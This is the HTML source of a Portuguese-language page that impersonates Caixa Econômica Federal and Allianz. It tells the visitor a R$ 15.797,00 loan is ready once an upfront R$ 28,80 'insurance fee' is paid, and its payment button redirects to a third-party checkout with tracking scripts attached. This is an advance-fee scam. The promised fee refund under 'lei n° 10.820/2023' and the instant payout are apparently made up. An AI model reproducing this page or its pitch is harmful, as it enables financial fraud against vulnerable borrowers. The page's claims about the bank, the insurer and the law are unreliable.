﻿<html><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica - Empréstimo</title>
    
     

<script src="../scripts/utms/latest-10.js" data-utmify-prevent-subids="" async="" defer=""></script>


    
    <link rel="stylesheet" href="css/s8mfDsa0K4Hq.css">
</head>

<body>
    <main class="container">
        <!-- Logo e Título -->
        <div class="header" style="background-color: white; padding: 18px; display: flex; justify-content: center;">
            <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
        </div>
        <!-- Título Principal -->
        <h2 class="main-title">Garanta seu empréstimo agora</h2>

        <p class="subtitle">Seu empréstimo está quase pronto, falta apenas confirmar alguns detalhes</p>

        <!-- Card Allianz -->
        <div class="allianz-card">
            <img src="images/lWNTSDJ3TXxI.png" alt="Allianz Logo" class="allianz-logo">

            <p class="allianz-text">A Allianz Seguradora será responsável pela segurança do seu empréstimo e por qualquer saldo que você não consiga pagar.</p>

            <p class="insurance-return">A taxa do seguro será 100% devolvida para você automaticamente após a quitação do empréstimo, conforme a sanção na lei do empréstimo n° 10.820/2023.</p>
        </div>

        <!-- Detalhamento da Tarifa -->
        <div class="insurance-details">
            <h3>Detalhamento da Tarifa do Seguro</h3>

            <p class="details-description">O cálculo do valor total da tarifa da seguradora é feito sobre o valor que você tem disponível para receber.</p>

            <div class="fee-list">
                <div class="fee-item">
                    <span>Declaração de seguro</span>

                    <span>R$ 14,43</span>
                </div>

                <div class="fee-item">
                    <span>Proteção da seguradora</span>

                    <span>R$ 13,21</span>
                </div>

                <div class="fee-item">
                    <span>Apólice virtual</span>

                    <span>R$ 4,16</span>
                </div>

                <div class="fee-item total">
                    <span>Total do seguro</span>

                    <span class="green-text">R$ 28,80</span>
                </div>
            </div>

            <!-- Valor do Empréstimo -->
            <div class="loan-value-container">
                <div class="loan-value-header">
                    <span class="checkmark">✓</span>

                    <span>Valor do empréstimo</span>
                </div>

                <div class="loan-amount" id="loanAmount">R$ 15.797,00</div>

                <p class="payment-info">Após o pagamento da seguradora, você receberá o valor em até 10 minutos</p>
                
                <p class="pix-info">Chave PIX:</p>
            </div>

            <!-- Botão de Pagamento -->
            <div class="payment-section">
                <span class="total-amount">R$ 28,80</span>

                <button class="pay-button" onclick="redirectWithUTMsToPayment();">
                    <span class="payment-icon">⋄</span>

                    Pagar agora
                </button>
            </div>
        </div>

        <!-- Footer -->
        <footer>
            <p>© Caixa Econômica - Todos os direitos reservados.</p>

            <p>CNPJ: 09.694.966/0001-40</p>

            <a href="#">Política de Privacidade</a>
        </footer>
    </main>

    <script src="js/fxRIMMcie4V8.js"></script>

    <script>
        function redirectWithUTMsToPayment() {
            const paymentUrl = "https://app.nivopayoficial.com.br/checkout/0924393a-4809-40d7-9a0a-41c4f6423d5e";

            window.location.href = paymentUrl + window.location.search;
        }
    </script>



</body><!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>